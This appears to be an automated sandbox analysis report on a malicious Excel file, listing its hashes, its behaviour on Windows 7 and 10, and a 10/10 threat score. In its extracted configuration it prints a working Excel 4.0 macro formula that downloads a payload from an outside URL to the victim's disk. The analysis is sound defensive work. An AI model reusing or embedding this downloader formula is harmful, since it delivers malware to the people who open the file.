General
-
Target
document-1851347184.xls
-
Size
39KB
-
Sample
210306-sc36ftcaks
-
MD5
8a90be28fd5b15dac37b54acf61257dd
-
SHA1
e7e8c7afa5b6912cfbef5813b54561f5c4cdc222
-
SHA256
fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425
-
SHA512
5e2eb198ca5cae3a7d314c0f4cfd6c61d5114a5737bfe4379bd0225f2cb21ad00b20b9c0443ab61bb8b6c208e4a3ff42a4c2d65832909c7fabaadfebb516f950
Behavioral task
behavioral1
Sample
document-1851347184.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-1851347184.xls
Resource
win10v20201028
Malware Config
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
Targets
-
-
Target
document-1851347184.xls
-
Size
39KB
-
MD5
8a90be28fd5b15dac37b54acf61257dd
-
SHA1
e7e8c7afa5b6912cfbef5813b54561f5c4cdc222
-
SHA256
fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425
-
SHA512
5e2eb198ca5cae3a7d314c0f4cfd6c61d5114a5737bfe4379bd0225f2cb21ad00b20b9c0443ab61bb8b6c208e4a3ff42a4c2d65832909c7fabaadfebb516f950
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-